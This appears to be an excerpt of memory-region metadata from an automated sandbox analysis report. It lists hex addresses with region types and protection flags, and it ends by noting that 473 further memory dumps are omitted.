page read and write
879C000
stack
page read and write
1E69AEAC000
trusted library allocation
page read and write
1B262C15000
heap
page read and write
1B267C10000
trusted library allocation
page read and write
1B262BC1000
trusted library allocation
page read and write
1E697E3B000
heap
page read and write
73E0000
heap
page execute and read and write
5989000
trusted library allocation
page read and write
1B267991000
trusted library allocation
page read and write
7FF936912000
trusted library allocation
page read and write
2DFA000
trusted library allocation
page execute and read and write
74AE000
stack
page read and write
FD22FE000
stack
page read and write
2A10000
heap
page read and write
2DD3000
trusted library allocation
page execute and read and write
705000
heap
page read and write
1E699C9D000
heap
page read and write
4930000
direct allocation
page read and write
1B267C10000
trusted library allocation
page read and write
FD057E000
unknown
page readonly
2D00000
direct allocation
page read and write
1E6B2211000
heap
page read and write
7FD0000
trusted library allocation
page read and write
1B262C02000
heap
page read and write
1E697E49000
heap
page read and write
7F790000
trusted library allocation
page execute and read and write
6E8000
heap
page read and write
1E6B22BB000
heap
page read and write
8D60000
direct allocation
page execute and read and write
250EC000
stack
page read and write
1CDD7FE000
stack
page read and write
1CDD97E000
stack
page read and write
1B267A22000
heap
page read and write
1E69AE94000
trusted library allocation
page read and write
1B2624AE000
heap
page read and write
1B267A91000
heap
page read and write
1B262360000
heap
page read and write
1E6B22AC000
heap
page read and write
7FF9369F0000
trusted library allocation
page read and write
71D0000
heap
page read and write
7FF936732000
trusted library allocation
page read and write
7FF936730000
trusted library allocation
page read and write
1B267AE3000
heap
page read and write
1B267CC0000
remote allocation
page read and write
1E69B118000
trusted library allocation
page read and write
8339000
heap
page read and write
7FF9369C0000
trusted library allocation
page read and write
1B2679F0000
trusted library allocation
page read and write
2D3E000
stack
page read and write
1E699830000
trusted library allocation
page read and write
1E69AEB8000
trusted library allocation
page read and write
1B267960000
trusted library allocation
page read and write
1B267EB0000
trusted library allocation
page read and write
82DA000
heap
page read and write
7FF936AB0000
trusted library allocation
page read and write
1E699E27000
heap
page read and write
FD197E000
unknown
page readonly
1E699E18000
heap
page read and write
7FF9368EA000
trusted library allocation
page read and write
7FF9369B0000
trusted library allocation
page read and write
7FF936900000
trusted library allocation
page execute and read and write
FD237E000
unknown
page readonly
804E000
stack
page read and write
1E6B2280000
heap
page read and write
7FF936A40000
trusted library allocation
page read and write
82CE000
heap
page read and write
5AF4000
trusted library allocation
page read and write
7500000
trusted library allocation
page read and write
1B2679F0000
trusted library allocation
page read and write
FD187C000
stack
page read and write
4688000
trusted library allocation
page read and write
1B267920000
trusted library allocation
page read and write
1B267B00000
heap
page read and write
7FF9368F0000
trusted library allocation
page execute and read and write
1E698015000
heap
page read and write
856C000
stack
page read and write
2CF0000
direct allocation
page read and write
67E000
unknown
page read and write
1B267C20000
trusted library allocation
page read and write
1E69A537000
trusted library allocation
page read and write
746E000
stack
page read and write
1CDD77B000
stack
page read and write
82CA000
heap
page read and write
FD0B79000
stack
page read and write
1CDD2E5000
stack
page read and write
8273000
heap
page read and write
7FF936816000
trusted library allocation
page execute and read and write
4900000
heap
page execute and read and write
1B262440000
heap
page read and write
7FF936A80000
trusted library allocation
page read and write
1E697E88000
heap
page read and write
7FF936970000
trusted library allocation
page read and write
1E69AD94000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
1E6B20A0000
heap
page execute and read and write
1E69AEAA000
trusted library allocation
page read and write
1B267ACE000
heap
page read and write
85AB000
stack
page read and write
1E69A6D5000
trusted library allocation
page read and write
2AB0000
direct allocation
page read and write
7FF9369E0000
trusted library allocation
page read and write
1B267C50000
trusted library allocation
page read and write
1CDD9BE000
stack
page read and write
72A9000
heap
page read and write
719F000
stack
page read and write
1E699E07000
heap
page read and write
1E698035000
heap
page read and write
7FF936A60000
trusted library allocation
page read and write
1E699F91000
trusted library allocation
page read and write
8650000
trusted library allocation
page read and write
1E6B1F90000
heap
page execute and read and write
7FF9369A0000
trusted library allocation
page read and write
1E699880000
trusted library allocation
page read and write
7FF936A90000
trusted library allocation
page read and write
1B262D09000
heap
page read and write
1B267AD0000
heap
page read and write
1CDD3EE000
stack
page read and write
2B1B000
heap
page read and write
1E6B21CC000
heap
page read and write
9854000
direct allocation
page execute and read and write
7FF936917000
trusted library allocation
page read and write
4905000
heap
page execute and read and write
7FF936733000
trusted library allocation
page execute and read and write
1B2624BD000
heap
page read and write
1B267A5B000
heap
page read and write
1B267940000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
2B3F000
stack
page read and write
1E69AEBC000
trusted library allocation
page read and write
704000
heap
page read and write
7590000
trusted library allocation
page read and write
8290000
heap
page read and write
1E69AFCB000
trusted library allocation
page read and write
2DC0000
heap
page read and write
1B2638A0000
trusted library allocation
page read and write
2A50000
heap
page read and write
80B0000
trusted library allocation
page execute and read and write
279C000
stack
page read and write
2AF0000
heap
page read and write
1CDE98B000
stack
page read and write
1B262BF0000
trusted library allocation
page read and write
8680000
direct allocation
page read and write
1E697E37000
heap
page read and write
7FF936A00000
trusted library allocation
page read and write
1E6B22A2000
heap
page read and write
7FF936850000
trusted library allocation
page execute and read and write
8235000
trusted library allocation
page read and write
6F00000
direct allocation
page read and write
1B262D1A000
heap
page read and write
1B262478000
heap
page read and write
6F10000
direct allocation
page read and write
2DA0000
trusted library section
page read and write
1B267A50000
heap
page read and write
1B26247C000
heap
page read and write
7FF936A30000
trusted library allocation
page read and write
80E0000
trusted library allocation
page read and write
1E697D9B000
heap
page read and write
1E69A926000
trusted library allocation
page read and write
1E6AA289000
trusted library allocation
page read and write
1E6B221A000
heap
page read and write
8250000
trusted library allocation
page read and write
2A3E000
unknown
page read and write
1B267A00000
heap
page read and write
7FF9367EC000
trusted library allocation
page execute and read and write
2516F000
stack
page read and write
1B267964000
trusted library allocation
page read and write
1E697E39000
heap
page read and write
8260000
trusted library allocation
page read and write
1B2624B4000
heap
page read and write
8150000
heap
page read and write
84F0000
trusted library allocation
page read and write
1E699F80000
heap
page execute and read and write
8140000
trusted library allocation
page read and write
72E1000
heap
page read and write
4750000
heap
page read and write
1E69A51B000
trusted library allocation
page read and write
1CDE80F000
stack
page read and write
1CDDBBE000
stack
page read and write
1E69A526000
trusted library allocation
page read and write
46DC000
stack
page read and write
2BC8000
heap
page read and write
75C0000
trusted library allocation
page read and write
1E69A6B9000
trusted library allocation
page read and write
1B2678A0000
trusted library allocation
page read and write
762B000
stack
page read and write
1E697F70000
heap
page read and write
2B77000
heap
page read and write
8690000
direct allocation
page read and write
8240000
trusted library allocation
page read and write
2DF0000
trusted library allocation
page read and write
71E1000
heap
page read and write
1B267C60000
trusted library allocation
page read and write
1E69A56C000
trusted library allocation
page read and write
7FF9368E1000
trusted library allocation
page read and write
85FE000
stack
page read and write
27AD000
stack
page read and write
1B262340000
heap
page read and write
485E000
stack
page read and write
720A000
heap
page read and write
1B262D02000
heap
page read and write
1CDDD3E000
stack
page read and write
251EF000
stack
page read and write
2DC8000
heap
page read and write
7FF936734000
trusted library allocation
page read and write
2CBF000
stack
page read and write
1E697E18000
heap
page read and write
2B43000
heap
page read and write
2512D000
stack
page read and write
4720000
trusted library allocation
page read and write
742E000
stack
page read and write
1E6A9F91000
trusted library allocation
page read and write
There are 473 further memdumps that are not shown in this listing.